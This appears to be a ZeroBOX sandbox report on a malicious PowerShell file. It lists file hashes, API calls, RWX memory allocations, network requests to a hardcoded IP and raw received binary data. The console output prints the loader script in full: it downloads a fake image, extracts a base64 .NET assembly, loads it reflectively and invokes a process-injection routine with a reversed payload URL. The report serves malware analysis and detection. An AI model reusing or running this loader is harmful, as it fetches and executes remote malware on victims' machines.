Summary | ZeroBOX

file_01ntx0mv.bfk.txt.ps1

Generic Malware Antivirus
Category Machine Started Completed
FILE s1_win7_x6401 July 4, 2024, 9:51 a.m. July 4, 2024, 9:53 a.m.
Size 1.4KB
Type UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
MD5 fdd6b3b4eafee0cdace6be04340d721d
SHA256 be0d4d2614cfa382d4c2c09ec6f5246b0578960650904a24c2783547c8f33a66
CRC32 CEAECD38
ssdeep 24:+RfOeuDmJMqNL3B1soSWCdhWZzwiK52Su2xc2hpfsHVjsfXV1sc:ufOE3xB1G/ZiuxrqqU1WV1sc
Yara None matched

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
91.92.254.194 Active Moloch

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: Exception calling "Invoke" with "2" argument(s): "The requested security protoc
console_handle: 0x00000023
1 1 0

WriteConsoleW

buffer: ol is not supported."
console_handle: 0x0000002f
1 1 0

WriteConsoleW

buffer: At line:1 char:917
console_handle: 0x0000003b
1 1 0

WriteConsoleW

buffer: + $link = 'http://91.92.254.194/imge/new-image_v.jpg'; $webClient = New-Object
console_handle: 0x00000047
1 1 0

WriteConsoleW

buffer: System.Net.WebClient; try { $downloadedData = $webClient.DownloadData($link) }
console_handle: 0x00000053
1 1 0

WriteConsoleW

buffer: catch { Write-Host 'Failed To download data from $link' -ForegroundColor Red; e
console_handle: 0x0000005f
1 1 0

WriteConsoleW

buffer: xit }; if ($downloadedData -ne $null) { $imageText = [System.Text.Encoding]::UT
console_handle: 0x0000006b
1 1 0

WriteConsoleW

buffer: F8.GetString($downloadedData); $startFlag = '<<BASE64_START>>'; $endFlag = '<<B
console_handle: 0x00000077
1 1 0

WriteConsoleW

buffer: ASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageT
console_handle: 0x00000083
1 1 0

WriteConsoleW

buffer: ext.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) {
console_handle: 0x0000008f
1 1 0

WriteConsoleW

buffer: $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $bas
console_handle: 0x0000009b
1 1 0

WriteConsoleW

buffer: e64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes =
console_handle: 0x000000a7
1 1 0

WriteConsoleW

buffer: [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.R
console_handle: 0x000000b3
1 1 0

WriteConsoleW

buffer: eflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('RunP
console_handle: 0x000000bf
1 1 0

WriteConsoleW

buffer: E.Home'); $method = $type.GetMethod('VAI').Invoke <<<< ($null, [object[]] ('txt
console_handle: 0x000000cb
1 1 0

WriteConsoleW

buffer: .4446sabbbbbbbewmadam/441.871.64.891//:ptth' , 'desativado' , 'desativado' , 'd
console_handle: 0x000000d7
1 1 0

WriteConsoleW

buffer: esativado','AddInProcess32','')) } }
console_handle: 0x000000e3
1 1 0

WriteConsoleW

buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException
console_handle: 0x000000ef
1 1 0

WriteConsoleW

buffer: + FullyQualifiedErrorId : DotNetMethodTargetInvocation
console_handle: 0x000000fb
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x05501528
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x05501528
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x05501528
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x05501528
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x05501528
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x05501528
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://91.92.254.194/imge/new-image_v.jpg
request GET http://91.92.254.194/imge/new-image_v.jpg
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2544
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0271b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2544
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0272f000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2544
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026b9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2544
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05710000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2544
region_size: 327680
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef40000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2544
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef40000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2544
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef40000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2544
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef30000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2544
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef30000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2544
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05711000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2544
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x060b0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2544
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02729000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2544
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a42000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2544
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05712000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2544
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05476000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2544
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05477000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2544
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05713000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2544
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05714000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2544
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027d0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2544
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05715000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2544
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027d1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2544
region_size: 1441792
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x07750000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2544
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x07870000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2544
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x07871000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2544
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x07872000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2544
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x07873000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2544
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x07874000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2544
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05716000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2544
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05717000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2544
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05718000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2544
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026bd000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2544
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05478000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2544
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05461000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2544
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05719000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2544
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x060b1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 15
family: 0
111 0
Data received žžDŠ^àÍ× *»¥Ùµ'Ò8DŽˆÆ·­û^UÕ]H,^œ`&û!ŠäSgŽõ«kÝ&iN –T ªíSÅÀâÚå•Ù–3¸ßBÜ Î}<Èhîã“\Œ Wðí³BHOÞ½*ƒux/2u?f]!–=+ÊÎBî^6’:ƒßŒRHÍ°;+†ç’?ëéuzí8/¡Wª2ß&ÏJ<ýp2¼ n‹Äð)÷£wUϯé|ZIôJ%hö²¼Ð6 gË¥y—{,Çi%{{V{³<ÌcÒêc@•ƒ Qgƒó¯åêàÕT+庺‚ °aa‰èAøæ«jÕ5:e‘[€Ä2·á<u瞾ٜ¨š²Ã§H¤UÚYNÂ6óÁ‰¿Ž1¤Uµ€nZÈàû|O~Glj‰mãm‘Ô`å՗Q|mès<ê1QÅpOªQ¤’TU¢NãÀ®üfmKøf§a–&µ#ñpsó¾®5û¬ò™ïž£žÙõïû]  &’ £wde&þþ¿®|ŸW,oáò!p®¬ {àbl n€1Ý3»D9³|ƒŠy¸†à1e¦ˆ-•^râ2ÊmE¬¨5;茩Ô$ADŽYN<µXö‹Z<WL€¾âþc8’àô:Ö\¾Ä΁ùàB&àV”l#‚ª-T ďŽ)µ%vQè=¯¾2\m, ðr:}qµrR~3ÐÖÚ<÷ÆDkÒFV7U} $Šcºö¿¶:tÓ<Q<`3I·Óé /¡Úw6949ù]ðé&5fShÌ€~EIüˆ?…]jiãÓޜ—Õ·3qék;x±føºäñҀ:1UônfÚY÷"¨P:òóӃÎ"ûÉØhۏWp<‰¹[qm¯´µí?Í?‘®ÖÅ<k{v¨V{Š¬ <žWÿ|˜ƒè’?\]&0ȱ±X2;(b ^)¯Ó$ª˜­ŠãÂ]TZæ1ªcÇ#¦Oâ $²¤Vø‘Ú›M!;Oá¬2ͧן/R‚Ú8£l}ðÖË›H‚>-²Ç©›î2uz)4’úÔ´wÃW\€*`tïd‹cŽ˜‚ ËyršÚ ÑàU':¢Áˆ‰$_éðý襤nƒü9 ¤5X+ÀKY¢Ò•óY\4 Æf¤ú• ^&þl0ÍçØє*8<ˆýÐK½HSÐQÁ7YüÍ3‚ü&ÁS\Žp)3ÊàvçÚ'Šr¡Š‘Ê:äù/±ŒÑÕ׋>ø2ùÊÈHP£¯s’•cb¹±.˜F¯¨Á$e%°*zŸ†®…’*IM±J .¯ÕD Ù7Ᾰ}##H m¶l6¥Òfƒm "ºà¼7Lñy‚F»¯­ü0jšxÖ·  Ù+¸úcb$‰gT2íc҆*ï^8ÕTu¿jÀè`ó¢©g7Ï£Åü±‰B)(£pj€q5™Š± µW =²Vz-~¢EŠÀЄETDíÛ¾fO¨B΀5nººçVÞö ñW|Rm’Ì\LÔIí€T•UT±Vïl‡D#vÖ¯â aâT@©v@«÷Îbâè©^„‚}Œ¨E.Þ/¹ÍbñíUµ4l™SHªC(#h‰çœ˜'FÑIÆûœo|Š$vdì¤^bÓÀŒåå$éÅbmb»Ì­xq6äa¾¯Œ ­B™&vQDš ¸Å™ 2~#5¤³'âKãÔí€$ÜO@p3ë:±¨ôþl[‰¢;àš¤Q»é€<ŠË*H"ˆÊÖVue¨ß?<¼jOE'é€>‡ ¢Ir.á”t(H'Ÿl¥`YÈ,JŠÆV³«'È»Ü-Õá*’¤ À Ùúaô˽É, íY£0Ë°ˆúã:Wvu…˜ÿ¶mC»m`¬Êh…s««ìkŒ ™ÛRÉÚC®»ãè0ˆ6f@ƘÑ?\ÏE*á›ð¨ oŒ?˜ÒS‹®Ô/åËDÖ 04Õáã$ bÁXÐ=†f4Ë@]0ê$.P°0žq6¢BÔ@­ œs“°`A$qf«ÃÌIf&¨ñðÎwR5°À<Z©<ÒÏŚÜò1¨¹iTƒÐøˆŸpU-êøwÇbZ(á[“d‘ÆÓÄ]#e6yïó«iÔ%@º§#ê»è£`^ӐÊv©<‹^ø5)*òAàbí©DpŠÀ
Data received ËÊILVÁª#p#ƒ––}ðÄ *R»@éÏó.}SÍ"TµFÕI Bú $üò“™˜…W,«W·4D…珞kË‘[6֌ t'ÓiÝ"‘ž—ÌZ‡S–œ"i’ÆâÄÄ_å€ÄÚyœFÒR´Õº®ÇVY´sæ)›RI<Ñ¡‰Ë¥Ô g>ºàÒû‘„c,šv3 Þ¤ro*Ò:Éæ«:ªÚ–ºÃtc2"mPÄآij1´óB‚¶Ú¦5š£F䎦«¸÷®0ñ=ÝÙ´ÌêÌÅdYE€ÊÊqõ™0y±M$I´Q¦ëÈ4|BYõÚÍDšX’u  ÁTP t Å}qX¼çšF‘Ù•M ıÜöº0V`©c¥ƒ†™‘̪/ü*§ôË @YԎlŽ2"uÔ+;¶æ=HéPÞYRѱçŽ;a"VÚÜ]Öl_ˆ“NÊ9`ßLm<°jn/’0 ’è 2û%bR®Æ,®,õç¦RT–-莖ÅPúTùŒ·ÓÓ×Í­m;NáðÅàÕ<š†ô©Üâ< hi];làž,ŒIôr@Ä««°…|ö$Û€ø'Üd7ÁºÆbŠVmê›[¯LG2±"Ørp—¡9ÖnïŸ|ƒÉ<VE`e*Äö=²Æ[ŒÐ£|`B›bŠaÞ­ê™}¾8Ø<¢÷ÎX1ò I¬¨zˆ©î8Â*ÙÉ^àp*±/~ტëïWö°ç¯ç€d¨è£€"l›ë‘Yb»xÊÖVugVu`ue¶,ôÎ I¬²ÄîiA8µÎ;™‰#®ôì„G9xᦹ[j)ô„ùd±bvI¾®IÎÚ$ЫýVGó[…tØeDNZ‚œ~€lxhÃÊȊVÏ4r¢ÛêjÆa’p—bŸc`ŸÒÇמ"ÈeDTE_OK®këx®ëôÂ;m׎8Áˆï«ía¹#Þ(î±òÏOö?S$ž,|Dz…‘YæP+)ŒÙ#Fz²íñŠ6Ø؟‡¾±wq3Øu£ÅXÅddb¦@6ò§­ü1‰A_.‰e,h' ƒH›is»ðK逦¯Fò4D8,³« £úõåu.òøŒÍ)nCÅ®¯òÏI«ó„>Ëê××<V Lúé3o"“©?L’o#\²QÞTWŠíߦ D²¾¢Qæ_¤=ò?,7…è$“_jceRŒÖàŠ«÷À}ÝS<m8U[bw( ßu'éQF«÷m´O¬O°L«™#pBØ?û` å!«ÔoÖÔÏ ¦‚9õQ¤²y(ÖYëŠæ«ù`_ï #4a÷(`_‹ü»eFÖj ,I"¶¢ñùuÍÑi~ø±#ª¥‰µo~GC¦Ò¤¾ ѯ›£p å·áZüDô¯†óÊ3mxA"–C`+Ž!<‹§Mb6<|þéÐÉ>¡âyæpӁJyïgß¾[Á4ë÷·I!¢Õ!PÂÃv'ƒôÀÀcdò97•¬gU´ê¦ÚÝíT( Z°:²r+:°&ÉNEdyÕ’,s‚“Н¤rz`q&ùÊÖØ1$qÀÈB€À¨õ¬µ…éÉ÷ÊõȬ n2£®HàØÎÀìâIȬ’o²+:³««'œŠÎ¬ ¿|¹`hP`ë:°/}lŽ•’‚qƒ¬êÀµß\ÒH>Ã)Yb{_p#ŒhݐrµX ¾¡œ’@ìqð®½qs‘YՁ՗Ýj²•’öÀöZÙPCŠUŠ²¨£|UæT¡-Ô(b¦¾<ñ›ƒÃ„ë;ØòB“||ÈÖ餈ƅ Üì+žõ€Œ‘iŽA¿ÃíŒxžGŠÂÞbÂåiYX€J°þuꮽ³ždä³JкP.þ•ƒ‰Þ[hpYZÊúoÚþµ§®ñmòº“nI‘•ŸÔÑ(]»ÉaëSÉä{ÑÆ| ôú}n…ã—K$~€Ð4E™X­c°Äü ëC·]´ìŒÁJ50=yïØã~º?‚fR©‹#a¶ƒd€>˜ÖI¦%bóÛaOH ItàŠØ=N¦&‡O K© K–JUT Š`=¿<b(>ñ ždQ¦à)‚tàIëÔà5ڏĚ8[r•&ÂÕqwÆtÍšÏK‡RŠJ²…Š‚ÔP OŒÔ֝1…"G+´!ƒzX÷ ŒÅÓA÷9RYQh€@cWÏ_–;©œÍNP*˜Š¯š,XæÀsC>“ÈÔÅâlQfÖAd©äÄ1@àVÀ_O.›U$»|ÈÞ6E&÷‹"SÔ¯ðœNX¼´Ú\²ìÛ@÷»éŠè‘`Ô $`@䓁©¨ð}bOØ&WPÒ2ö!«o@x±Ûùq‘*¾š’Ã$±ïô÷凶zýs>'BÇi]«ccCՈÿéž9 ÔÎ#r’¸mª¤Ù¾£ËN tËö^aJu•l€Hõ1=~pž«€6žhLÔ6ÑÁëÛ›ìþ¯Iá›dJ%YݕM–^vŽ‡ð“}2þàO>‰ux‡!TΰãÉNõ¾2šZI ÈÔ4{Bʤ»;Få6;ç#‚À5t¿ooÓ=ŸŽý/¯žxçóžY™X¬lÛJ‹æ‡ÄfNŽ |?ïqjeû»ùlZ$3ŒA»_~˜x8ÄS¸Ô¤›¶°<µöʺ§¤«ÀÝxMVŽ]<i#£ªHNÂË[€®\x‹Dd!UQ(ÕüD1äþxM'‹j *²O$ ýÑv @ö1m•õš•‚6Œ3XØ(º4,÷=Č6»Ã_Bµ$‘3zIU&ÆàHíDpz`F¦xcÕHtî³Fê ,»EûWÃ)«Ô D¥ãŒD¬Y¶/áOô}1rèadîp5¤žðèB=KzTò ²›£\z¯ƒ•ðß“FUc—†"·n¼U×ÓÖé~é¨ò˂6#;îPß|^Þi–5êÜ ü°=_ˆ@ÀÊðêTÌÃa;w4‹±M.Õ4{u>y,b2;K ”3zH#ðí´mSÍ/4O^rtQùó§—WE;¢”²î%á=˜®#㡺-^ØE2#¡xâ¹ßúí<ó<Šg,ñÑRt]31¼B}I°X\3ü&úç®Òi4þ"ªS Ñ·í6@P,Õr9ö<üo)þÍðß i|0Hͨž-Ëh…U-d«ÛÿL 餆X´²Ë:´‹.˜È¡Xí ¤µ½ÏkÆ¢ñdXPK<H»4+ <ùœŸÃÝ1h`ÑÌúH£˜(fU*éL9硼E„N]#UÞ¹À.øã^% Ñk"Ó®œÂÑ+y¬Œ¾îÔzlfG„Á§Dú½ÅC Ýê »¹ã¾jhtºo L·(eôðBÉº#¦Lq#hYa’Ze˜1 ’ w¿ó¼ j4ƒRt©çD4ʁ‹]ìúG¤tþ†dŽ]‘Z4Uí »w:]|0i§Õ,ºR5yC¢î=oZç|¦ *ý‚¶âɶà ‚ZûXñ•1;QWk5ÅÉü¯œˆ4zXÁŒF¥Yƒ(a|‘ɬ¶ŠI_K¦V]Ä(MËV¾¦Q¹@è6à§ÕvžD–M¾o¬0AÚOçú`Xâf5ÀôãüÙIcB¥â ¯Åú+Šó¼“;«E1 †P™OK°hŠ 2»;³²´q…<–ÝÈ+Ïá¿âÀį,¨¡šÁŠÖ`¦6XÎÒą5dqÁ\¬»CÃ*šnEPQf¬{e©¼¹+V ßµ @±,+æ¸b JÖæ£Ïç‹jÑ]•Ð2†àîèñ¾U %«ã“ß%Â2²ï] °ëuÅíü…à)"‰¦X¢Ó»µ°gV­|úâÆx”ýâi•`¨n«Ž}ìæ¨ÔŽVUYU•I 9 |â²ù¥Cʤµò¯aA÷ '‰Úh·¨ CŠ»«Ñíƒ#O¨ic‡Dª‰ ÊXx<Ñäð~™± Ì}z‡YŒJB*Ç{oƒÎQâT€4O榌X4E+­àyˆ@WÚÀ&ì“cl9XÃ"ÜçŸG²C RÑ)à©ÜI¡Ô_ñê܋SìôÀ¨D- aj ‘ÍV„¯äîkän«Á‡{a¶½Ï|Ôv…Gç€Ë…}K„-q]tzZVzb•ø½þ?½®Ý¤P"¯çìO,¶bxË$F ¦‰êWÛ I= »J-_ø€¼]UºÕaP¢éjê0/1ÈÄÊæ4=n¸Â ;;9qU îØ,¦R H(PQ³ÖïÛÞ@•qÑzŽpž% •ÝÖÅs!ÐQÛٰڝ±HcY“Óó8K;ˆÔrÄÍ~¸i<7LÊeó<ÖRG–µGáÎ1Ómý·†-DWV')£‚H_0í,Ä`Ö] ó!Ô)˜³IDµ[p#é >hÒ ¥°µ¶ÇÃ
Data received Wú9X<@c÷xW¥mÚÕ~ücrÐȆ”¸*X¯Â°h¢(‘E6ЁGŒ$PÉ2¯’6ôÝ°Q#Ÿlf4-§VdEg‚²­ž; ´ZvV-½vf ÕɾO×*4Fãõ‚UXNí½ýð ›BÒªáf°X,YöÆõÐiÚd¸ÑˆP× ³Ó¦ÑêU÷‡$Ù!T‚:°6,×nà ©S¸[nô‚O£…#‘ÄjRmT^ háEž9î1ã»É u®2 n î*¹ ù`ó”£MÜ^S§Š]§›ä±éôÍw…‚†R¤Ž¹“®ÚÎE)㦒ď‚ѵ]Œ]tå}AÀ#‘k—Ü¥¶§Žƒ,HƆÚ\ j%“RÃÌrÄ{/L¢À¼0ø녥Õ‰­C—vIfgP#Vþ€7D‘¨š p}ð&*i¬×O®0ÉÍ]‚ãÜÕW×á€9aòÕXµ“یˌ±³X¸»®yãï uŽ¦ÂGæ1ò Y7bI¿‡ǫ̀c’+“hª#œb"á€AÙ¶ý«ï¤»}Š¥€V÷ëÆQ4(#ŠC-,„é² ÐâðÑ$ˆ¨«ijˆ¬²Æ«±T0†P¤Õß?×Ri ÿ³ÄkC6Û¾§§é…ƒÃ×M ŸÎÝ· ÙW|{ürÅЙ@p‹žøhI1ªGźt]]JÑ@ò•V°UW©®§œ,~X„Ã$†]êFâ(š$ûà§ÓÕ.¢ÔsœG,8m°8ø@;Xj8jÚ6tý~xü6"L¶Ê¬ÍéëcŽøÞE乑@^]¼8fÜ썸J×`Œ4þ±mÙÔÜfÒ¹ ä D7yÆB.Õ›éß8ç›Ü‹/$ Uf(®AbðƒN¬ŒòîW lv¡ØãX•”ÈÂÐ*Enýq$‘Õ ’Tx®0ú`  “UòÀÙѼZYŒ†˜«PSÐã7“]4Ö"ARTX>›þYçÆÇð•bIÜOo'6ü(*H«Ûe¬×_ý°7¢ðí j`ëùæ¤:€—-¼¯"ň1†P‚§w¤×ØöÍ1)‚Zû~+Ài´ÂI¼Âûw鮟®Ëi@IfêM|=ñ4Þξ²Ÿaxä+QªÃóÀz8B!c´Š÷oú->¡6H#en#ûàHb ã‘Uîq˜”ÆÏ¥ÖˆûSû3Òøˆi4ˆJ&†|gƾÏk<vŽhØx5Ÿ«"%¨$žûk2>Ñý’Ñøö‘’Da5t8•U¨ãú64h{ºÿ<ÒûYö_SöwĞ'F1_¥«®cèœ.¦"MÀþ¸³Ã½Z´ äã¹ÛY©¤­íUó/M¬Ž=<¯æ f¤pèy9èühôzC¯ÔÍm¶¶ÃÒ·ÄàAöqÝwêdØ:•^¿ž<|7Á£;^T¾œËÏóÏ?«ñæÖ»¨Tˆ~W¾'÷ˆúXÿç±üC:§¯Å[pϜøχO¡×Oæ ÈdjeéÔæìzԁÃÇ©UaÝ\ ø¤^,Ú½4îžfæäê×çåÑ<ÇÛt:±öÎDŒ³J)Pa’%U×s¾ÓÈàOó–RG 6!؁îÿdußm sd„7Ðgêp)@®™ðßØGƒ˜×S¯xÈfô«|3îbûàAÊOAß.xí•"7€#]²2Äqu€ÕêcÑédžF ˆ¥‹@VÄ?l~*u+‡ÆÖ"[añ9òѧbóÓý 